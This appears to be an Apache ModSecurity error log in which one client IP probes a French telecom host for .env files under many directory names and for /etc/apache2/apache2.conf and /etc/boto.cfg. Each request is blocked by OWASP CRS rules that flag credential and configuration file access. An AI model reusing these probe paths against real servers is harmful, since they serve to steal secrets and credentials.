[Mon May 11 20:56:02.075721 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agImQteaRXe5lR8y0ZOTIAAAAVU"]
[Mon May 11 20:56:02.075891 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agImQteaRXe5lR8y0ZOTIAAAAVU"]
[Mon May 11 20:56:02.076070 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agImQteaRXe5lR8y0ZOTIAAAAVU"]
[Mon May 11 20:56:02.104931 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agImQvjVc-A-CSptvm1xuAAAAFE"]
[Mon May 11 20:56:02.105129 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agImQvjVc-A-CSptvm1xuAAAAFE"]
[Mon May 11 20:56:02.105335 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agImQvjVc-A-CSptvm1xuAAAAFE"]
[Mon May 11 20:56:02.276589 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agImQteaRXe5lR8y0ZOTIgAAAVU"]
[Mon May 11 20:56:02.276767 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agImQteaRXe5lR8y0ZOTIgAAAVU"]
[Mon May 11 20:56:02.276960 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agImQteaRXe5lR8y0ZOTIgAAAVU"]
[Mon May 11 20:56:02.348472 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /front/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/front/.env"] [unique_id "agImQpYn-x0CHsbEbP2t4wAAAIo"]
[Mon May 11 20:56:02.348625 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/front/.env"] [unique_id "agImQpYn-x0CHsbEbP2t4wAAAIo"]
[Mon May 11 20:56:02.348794 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/front/.env"] [unique_id "agImQpYn-x0CHsbEbP2t4wAAAIo"]
[Mon May 11 20:56:02.388131 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agImQvjVc-A-CSptvm1xvgAAAFE"]
[Mon May 11 20:56:02.388302 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agImQvjVc-A-CSptvm1xvgAAAFE"]
[Mon May 11 20:56:02.388482 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agImQvjVc-A-CSptvm1xvgAAAFE"]
[Mon May 11 20:56:02.456840 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /fe/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/fe/.env"] [unique_id "agImQjP5Q_-MBliRCAxnwgAAAAI"]
[Mon May 11 20:56:02.457043 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/fe/.env"] [unique_id "agImQjP5Q_-MBliRCAxnwgAAAAI"]
[Mon May 11 20:56:02.457264 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/fe/.env"] [unique_id "agImQjP5Q_-MBliRCAxnwgAAAAI"]
[Mon May 11 20:56:02.480044 2026] [proxy_fcgi:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:02.530416 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agImQjP5Q_-MBliRCAxnxwAAAAI"]
[Mon May 11 20:56:02.530605 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/lms/.env"] [unique_id "agImQpYn-x0CHsbEbP2t5AAAAIo"]
[Mon May 11 20:56:02.530645 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agImQjP5Q_-MBliRCAxnxwAAAAI"]
[Mon May 11 20:56:02.530767 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/lms/.env"] [unique_id "agImQpYn-x0CHsbEbP2t5AAAAIo"]
[Mon May 11 20:56:02.530859 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agImQjP5Q_-MBliRCAxnxwAAAAI"]
[Mon May 11 20:56:02.530949 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/lms/.env"] [unique_id "agImQpYn-x0CHsbEbP2t5AAAAIo"]
[Mon May 11 20:56:02.610399 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agImQlNddpkriGUb6ZV28QAAARg"]
[Mon May 11 20:56:02.610721 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agImQlNddpkriGUb6ZV28QAAARg"]
[Mon May 11 20:56:02.610950 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agImQlNddpkriGUb6ZV28QAAARg"]
[Mon May 11 20:56:02.615373 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/etc/boto.cfg"] [unique_id "agImQvjVc-A-CSptvm1xwQAAAFE"]
[Mon May 11 20:56:02.615623 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/etc/boto.cfg"] [unique_id "agImQvjVc-A-CSptvm1xwQAAAFE"]
[Mon May 11 20:56:02.615796 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/etc/boto.cfg"] [unique_id "agImQvjVc-A-CSptvm1xwQAAAFE"]
[Mon May 11 20:56:02.656827 2026] [proxy_fcgi:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:02.661476 2026] [proxy_fcgi:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:02.707336 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/new/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzQAAABY"]
[Mon May 11 20:56:02.707508 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/new/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzQAAABY"]
[Mon May 11 20:56:02.707710 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/new/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzQAAABY"]
[Mon May 11 20:56:02.714695 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node-api/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLAAAAUY"]
[Mon May 11 20:56:02.714846 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node-api/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLAAAAUY"]
[Mon May 11 20:56:02.715011 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node-api/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLAAAAUY"]
[Mon May 11 20:56:02.724086 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLQAAAVM"]
[Mon May 11 20:56:02.724251 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLQAAAVM"]
